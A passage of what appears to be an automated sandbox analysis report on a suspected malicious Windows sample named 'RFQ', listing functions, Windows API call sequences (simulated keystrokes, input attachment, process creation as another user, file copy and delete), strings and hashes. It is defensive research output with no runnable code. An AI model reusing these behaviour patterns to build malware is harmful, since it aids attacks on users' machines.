                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle
                                                                          • String ID:
                                                                          • API String ID: 2962429428-0
                                                                          • Opcode ID: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction ID: 552ddd844a8bbede063c80161f66c4637379340f91e2bb70a518b226642b2913
                                                                          • Opcode Fuzzy Hash: 4893ac657bcef9b9334a0355bd28ce0f0291ef024a1c9f1561977d8c5be9d70a
                                                                          • Instruction Fuzzy Hash: B9E045B4A04B008BC6308F5BE444416FBF8EEE46203108E1FD4A6C2A64C3B4A1498F50
                                                                          Function 040322E4 Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction ID: 4ed50f4569a6dabae743e2dddbe25440e1b8b52cb20ba13c55ebc2f798bd2840
                                                                          • Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
                                                                          • Instruction Fuzzy Hash: B5E0BF7494010DEFDB00EFA4D5496DD7BB4EF04302F1005A5FD05E7680DB309E648A62
                                                                          Function 040322E8 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000001F4), ref: 040322F9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1284925930.0000000004030000.00000040.00000020.00020000.00000000.sdmp, Offset: 04030000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_4030000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Sleep
                                                                          • String ID:
                                                                          • API String ID: 3472027048-0
                                                                          • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction ID: 172a1a794255a3812b7b108d2c73797798c64b04aa6f1dcee18fa2b9c4f466d2
                                                                          • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                          • Instruction Fuzzy Hash: 59E0E67494010DDFDB00EFB4D54969D7FB4EF04302F1005A5FD01E2280D6309D608A72

                                                                          Non-executed Functions

                                                                          Function 0047C81C Relevance: 74.2, APIs: 40, Strings: 2, Instructions: 674windowkeyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C8E1
                                                                          • DefDlgProcW.USER32(?,0000004E,?,?), ref: 0047C8FC
                                                                          • GetKeyState.USER32(00000011), ref: 0047C92D
                                                                          • GetKeyState.USER32(00000009), ref: 0047C936
                                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C949
                                                                          • GetKeyState.USER32(00000010), ref: 0047C953
                                                                          • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C967
                                                                          • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C993
                                                                          • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C9B6
                                                                          • _wcsncpy.LIBCMT ref: 0047CA29
                                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047CA5A
                                                                          • SendMessageW.USER32 ref: 0047CA7F
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0047CADF
                                                                          • SendMessageW.USER32(?,00001030,?,0047EA68), ref: 0047CB84
                                                                          • ImageList_SetDragCursorImage.COMCTL32(00ADF330,00000000,00000000,00000000), ref: 0047CB9B
                                                                          • ImageList_BeginDrag.COMCTL32(00ADF330,00000000,000000F8,000000F0), ref: 0047CBAC
                                                                          • SetCapture.USER32(?), ref: 0047CBB6
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CC17
                                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?,?,?), ref: 0047CC26
                                                                          • ReleaseCapture.USER32 ref: 0047CC3A
                                                                          • GetCursorPos.USER32(?), ref: 0047CC72
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CC80
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CCE6
                                                                          • SendMessageW.USER32 ref: 0047CD12
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CD53
                                                                          • SendMessageW.USER32 ref: 0047CD80
                                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0047CD99
                                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0047CDAA
                                                                          • GetCursorPos.USER32(?), ref: 0047CDC8
                                                                          • ScreenToClient.USER32(?,?), ref: 0047CDD6
                                                                          • GetParent.USER32(00000000), ref: 0047CDF7
                                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 0047CE60
                                                                          • SendMessageW.USER32 ref: 0047CE93
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CEEE
                                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,03041C90,00000000,?,?,?,?), ref: 0047CF1C
                                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 0047CF46
                                                                          • SendMessageW.USER32 ref: 0047CF6B
                                                                          • ClientToScreen.USER32(?,?), ref: 0047CFB5
                                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,03041C90,00000000,?,?,?,?), ref: 0047CFE6
                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0047D086
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$ClientScreen$Image$CursorDragList_State$CaptureLongMenuPopupTrackWindow$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                          • String ID: @GUI_DRAGID$F
                                                                          • API String ID: 3100379633-4164748364
                                                                          • Opcode ID: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction ID: 980357f173c9be8e312ccaa606797ee7157b6525bda81ee0817efdfc4c954517
                                                                          • Opcode Fuzzy Hash: 2b9e17ba3223fb7b4804536e302a42d427f78481ee09a8534aafb1e4469c1a6d
                                                                          • Instruction Fuzzy Hash: F842AD706043419FD714DF28C884FABB7A5FF89700F14865EFA489B291C7B8E846CB5A
                                                                          Function 00434418 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 133keyboardthreadwindowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00434420
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00434446
                                                                          • IsIconic.USER32(?), ref: 0043444F
                                                                          • ShowWindow.USER32(?,00000009), ref: 0043445C
                                                                          • SetForegroundWindow.USER32(?), ref: 0043446A
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434481
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00434485
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00434493
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A2
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004344A8
                                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 004344B1
                                                                          • SetForegroundWindow.USER32(00000000), ref: 004344B7
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344C6
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344CF
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344DD
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344E6
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 004344F4
                                                                          • keybd_event.USER32(00000012,00000000), ref: 004344FD
                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0043450B
                                                                          • keybd_event.USER32(00000012,00000000), ref: 00434514
                                                                          • SetForegroundWindow.USER32(00000000), ref: 0043451E
                                                                          • AttachThreadInput.USER32(00000000,?,00000000), ref: 0043453F
                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434545
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ThreadWindow$AttachInput$ForegroundVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 2889586943-2988720461
                                                                          • Opcode ID: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction ID: 0b42b206f44700a00bd4aa1610e9651ae8f7722fee000eb3c659fd44b6abead8
                                                                          • Opcode Fuzzy Hash: 8fb90041bee2e10260771149cd23f534c9f7767a381d567acbe6a88cba9e6a8e
                                                                          • Instruction Fuzzy Hash: AD416272640218BFE7205BA4DE4AFBE7B6CDB58B11F10442EFA01EA1D0D6F458419BA9
                                                                          Function 00446313 Relevance: 37.0, APIs: 17, Strings: 4, Instructions: 234processCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 0044638E
                                                                          • CloseHandle.KERNEL32(?), ref: 004463A0
                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004463B8
                                                                          • GetProcessWindowStation.USER32 ref: 004463D1
                                                                          • SetProcessWindowStation.USER32(00000000), ref: 004463DB
                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004463F7
                                                                          • _wcslen.LIBCMT ref: 00446498
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _wcsncpy.LIBCMT ref: 004464C0
                                                                          • LoadUserProfileW.USERENV(?,00000020), ref: 004464D9
                                                                          • CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 004464F3
                                                                          • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,?,?,000F01FF,00000400), ref: 00446522
                                                                          • UnloadUserProfile.USERENV(?,?), ref: 00446555
                                                                          • CloseWindowStation.USER32(00000000), ref: 0044656C
                                                                          • CloseDesktop.USER32(?), ref: 0044657A
                                                                          • SetProcessWindowStation.USER32(?), ref: 00446588
                                                                          • CloseHandle.KERNEL32(?), ref: 00446592
                                                                          • DestroyEnvironmentBlock.USERENV(?), ref: 004465A9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: StationWindow$CloseProcess$User$BlockCreateDesktopEnvironmentHandleOpenProfile$DestroyDuplicateLoadTokenUnload_malloc_wcslen_wcsncpy
                                                                          • String ID: $@OH$default$winsta0
                                                                          • API String ID: 3324942560-3791954436
                                                                          • Opcode ID: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                          • Instruction ID: a255b9755a473e3b45922b0ee48cea4cb67e1360e8ecd59b8ab49ad27cdc7b44
                                                                          • Opcode Fuzzy Hash: b5525f1ade2b057c7f9e31d74da72dff15b4031de69b799d2ab87430ccd2f155
                                                                          • Instruction Fuzzy Hash: A28180B0A00209ABEF10CFA5DD4AFAF77B8AF49704F05455EF914A7284D778D901CB69
                                                                          Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _wcslen.LIBCMT ref: 004096C1
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • _memmove.LIBCMT ref: 0040970C
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                                          • _memmove.LIBCMT ref: 00409D96
                                                                          • _memmove.LIBCMT ref: 0040A6C4
                                                                          • _memmove.LIBCMT ref: 004297E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$std::exception::exception$BuffCharException@8ThrowUpper_malloc_wcslen
                                                                          • String ID:
                                                                          • API String ID: 2383988440-0
                                                                          • Opcode ID: b038371bcf1c5dd0eef4ce0c8f02f873b5b7968284c29e04085d9bb22d62c8a1
                                                                          • Instruction ID: 3262ed4b583d717621f118bf118656dde374edbe3d76219253c131e703a2432c
                                                                          • Opcode Fuzzy Hash: b038371bcf1c5dd0eef4ce0c8f02f873b5b7968284c29e04085d9bb22d62c8a1
                                                                          • Instruction Fuzzy Hash: CD13BF706043109FD724DF25D480A2BB7E1BF89304F54896EE8869B392D739EC56CB9B
                                                                          Function 0044BD27 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 178filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 0043392E
                                                                            • Part of subcall function 00433908: __wsplitpath.LIBCMT ref: 00433950
                                                                            • Part of subcall function 00433908: __wcsicoll.LIBCMT ref: 00433974
                                                                            • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                          • _wcscat.LIBCMT ref: 0044BD94
                                                                          • _wcscat.LIBCMT ref: 0044BDBD
                                                                          • __wsplitpath.LIBCMT ref: 0044BDEA
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0044BE02
                                                                          • _wcscpy.LIBCMT ref: 0044BE71
                                                                          • _wcscat.LIBCMT ref: 0044BE83
                                                                          • _wcscat.LIBCMT ref: 0044BE95
                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0044BEC1
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BED3
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BEF3
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF0A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0044BF15
                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 0044BF2C
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF33
                                                                          • MoveFileW.KERNEL32(?,?), ref: 0044BF4F
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044BF64
                                                                          • FindClose.KERNEL32(00000000), ref: 0044BF7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: File$Find_wcscat$__wsplitpath$CloseCopyDeleteMove$AttributesFirstFullNameNextPath__wcsicoll_wcscpylstrcmpi
                                                                          • String ID: \*.*
                                                                          • API String ID: 2188072990-1173974218
                                                                          • Opcode ID: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction ID: 72a2fd59153234373391f972af8bc7e503bf673df65afccb4f4ecee040a4f935
                                                                          • Opcode Fuzzy Hash: c24caf0b266a53f5e7acd00b30f5ede1e5d756040c77aa0fe23e7167681731b8
                                                                          • Instruction Fuzzy Hash: E25167B2408384AAD734DB50DC45EDF73E9AFC8304F544E1EF68982141EB75D249CBA6
                                                                          Function 004788BD Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 217timefileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                          • FindClose.KERNEL32(00000000), ref: 00478924
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                          • __swprintf.LIBCMT ref: 004789D3
                                                                          • __swprintf.LIBCMT ref: 00478A1D
                                                                          • __swprintf.LIBCMT ref: 00478A4B
                                                                          • __swprintf.LIBCMT ref: 00478A79
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 00413314
                                                                            • Part of subcall function 0041329B: __flsbuf.LIBCMT ref: 0041332C
                                                                          • __swprintf.LIBCMT ref: 00478AA7
                                                                          • __swprintf.LIBCMT ref: 00478AD5
                                                                          • __swprintf.LIBCMT ref: 00478B03
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                          • API String ID: 999945258-2428617273
                                                                          • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                          • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                          • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                          Function 004033C0 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 359COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                          • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                          • __wsplitpath.LIBCMT ref: 00403492
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcscpy.LIBCMT ref: 004034A7
                                                                          • _wcscat.LIBCMT ref: 004034BC
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                            • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                          • _wcscpy.LIBCMT ref: 004035A0
                                                                          • _wcslen.LIBCMT ref: 00403623
                                                                          • _wcslen.LIBCMT ref: 0040367D
                                                                          Strings
                                                                          • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                          • Error opening the file, xrefs: 00428231
                                                                          • Unterminated string, xrefs: 00428348
                                                                          • _, xrefs: 0040371C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                          • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                          • API String ID: 3393021363-188983378
                                                                          • Opcode ID: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                          • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                          • Opcode Fuzzy Hash: 7ca9ad7ef7208bb045d11657cd721343b767352ed1bccac0ebefd6c576abac4e
                                                                          • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                          Function 00431A86 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 139fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                          • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                          • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                          • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
